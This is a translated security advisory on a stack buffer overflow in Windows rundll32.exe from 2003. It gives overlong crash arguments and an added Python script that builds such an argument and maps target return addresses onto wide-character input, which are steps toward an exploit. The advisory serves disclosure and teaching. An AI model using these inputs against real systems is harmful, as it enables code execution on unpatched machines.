Microsoft rundll32.exe Local Buffer Overflow Vulnerability

Published: 2003-07-06
Updated: 2003-07-11

Affected systems:
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1

Description:
BUGTRAQ ID: 8114

Microsoft Windows is the operating system developed by Microsoft.

The rundll32.exe utility shipped with Microsoft Windows does not adequately check the length of the arguments it is given. A local attacker can exploit this to trigger a stack-based buffer overflow.

When an overly long string is passed to rundll32.exe as the DLL/entry-point argument, the buffer holding the parsed argument overflows and control of the instruction pointer is lost, so arbitrary code could be run in the context of the rundll32.exe process. Because rundll32.exe runs with the privileges of whoever launches it, the overflow by itself only affects the invoking user's process; executing code with higher privileges requires a privileged component (a service, scheduled task or installer) that invokes rundll32.exe with attacker-influenced arguments.

<*Source: Rick Patel (rikul@bellsouth.net)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Rick Patel (rikul@bellsouth.net) provided the following test method:

rundll32.exe  advpack32.dll,<'A'x499>

On a system with SP4 applied, the following also triggers the overflow (this is a single command line, wrapped here for display; the DLL name given to rundll32.exe is rundll32.exe itself, followed by a run of 'A' and then a run of '%'):

C:\WINNT\system32>rundll32.exe
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...

The fault address is not random: rundll32.exe handles its command line as UTF-16LE wide characters, so a run of '%' (0x25) lays down the bytes 25 00 25 00 ..., which read as a little-endian 32-bit value is 0x00250025. The saved return address has therefore been overwritten from inside the '%' run, which is the usual sign that the return address (and hence EIP) is attacker-controlled.
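The following is an added example, not part of the original advisory or of Rick Patel's post. It builds an argument of the same shape as the two test strings above (`<dll>,<long run of characters>`) and shows why the fault address reads 0x00250025: it assumes rundll32.exe stores the parsed argument as UTF-16LE wide characters (two bytes per character), and the filler and padding counts are only approximations of the published payload, not measured offsets.

```python
"""
Added example (not from the original advisory or Rick Patel's post): build a
rundll32.exe crash argument of the shape shown above and decode why the
reported fault address is 0x00250025.

Assumption (labelled here and in the lead-in): rundll32.exe keeps its command
line as UTF-16LE wide characters, so each character occupies two bytes. The
filler/padding counts only approximate the published payload.
"""
import struct

# Character counts roughly matching the SP4 payload in the advisory (assumed).
N_FILLER = 225   # run of 'A'
N_PAD = 455      # run of '%'


def build_argument(dll="rundll32.exe", filler="A", n_filler=N_FILLER,
                   pad="%", n_pad=N_PAD):
    """Return the single argument `<dll>,<filler...><pad...>` that the
    advisory passes to rundll32.exe on one command line."""
    return f"{dll},{filler * n_filler}{pad * n_pad}"


def wide_bytes(s):
    """Encode the argument the way rundll32.exe stores it internally:
    UTF-16LE, two bytes per character ('A' -> 41 00, '%' -> 25 00)."""
    return s.encode("utf-16-le")


def dword_at_char(s, index):
    """The 32-bit little-endian value formed by the two wide characters that
    start at character `index`: what a saved return address lying at that
    position in the overflowed buffer would be overwritten with."""
    return struct.unpack_from("<I", wide_bytes(s), 2 * index)[0]


def chars_for_address(addr):
    """Inverse of dword_at_char: the two characters whose wide-char encoding
    writes `addr` into a DWORD slot, or None if the value cannot be produced
    (a 0x0000 code unit terminates the string; a lone surrogate would not
    survive conversion). ASCII-only input can only yield 0x00XX00YY values."""
    units = (addr & 0xFFFF, addr >> 16)
    for u in units:
        if u == 0 or 0xD800 <= u <= 0xDFFF:
            return None
    return "".join(chr(u) for u in units)


def main():
    arg = build_argument()
    print(f"argument: {len(arg)} chars, {len(wide_bytes(arg))} bytes as UTF-16LE")
    # Inside the 'A' run a return-address slot would receive 0x00410041 ...
    print(f"DWORD in filler region: {dword_at_char(arg, 20):#010x}")
    # ... and inside the '%' run 0x00250025, the fault address in the advisory.
    print(f"DWORD in padding region: {dword_at_char(arg, 300):#010x}")
    print("chars producing 0x00250025:", repr(chars_for_address(0x00250025)))
    # A hypothetical address with non-zero high bytes needs non-ASCII characters.
    print("chars producing 0x12345678:", repr(chars_for_address(0x12345678)))
    print("chars producing 0x00250000:", chars_for_address(0x00250000))


if __name__ == "__main__":
    main()
```

The practical point of `chars_for_address` is the constraint the wide-character copy imposes on an exploit: every byte pair written into the stack comes from one 16-bit code unit, so an address such as 0x00250025 is reachable with plain ASCII, while an address whose halves are not of the form 0x00XX needs characters outside ASCII, and any target containing a 0x0000 code unit is unreachable because it terminates the string.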

Recommendations:
Vendor patch:

Microsoft
---------
At the time of writing the vendor has not released a patch or upgrade. Users of this software are advised to monitor the vendor's site for the latest version:

http://www.microsoft.com/technet/security/

This vulnerability was translated and compiled by NSFOCUS. All rights reserved; do not reproduce without permission.